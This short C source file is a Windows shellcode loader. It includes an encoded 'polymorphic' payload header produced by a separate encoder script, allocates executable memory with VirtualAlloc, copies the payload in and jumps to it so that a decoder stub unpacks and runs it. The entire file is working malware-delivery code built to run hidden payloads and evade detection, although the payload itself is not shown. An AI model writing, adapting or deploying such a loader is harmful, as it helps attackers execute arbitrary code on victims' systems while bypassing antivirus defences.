#include <windows.h>
// compile : x86_64-w64-mingw32-gcc -Wall -O2 loader.c -o loader.exe 
/* Polymorphic payload generated by poly_enc_x64.py */
#include "encoded_payload.h"

int main() {
    /* Allocate RWX memory for the payload */
    void *exec = VirtualAlloc(0, poly_payload_len, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
    if (!exec) return 1;

    /* Copy the polymorphic shellcode (decoder + keys + encoded payload) */
    CopyMemory(exec, poly_payload, poly_payload_len);

    /* Execute — the decoder stub runs first, decodes the payload, then jumps to it */
    ((void(*)())exec)();

    return 0;
}

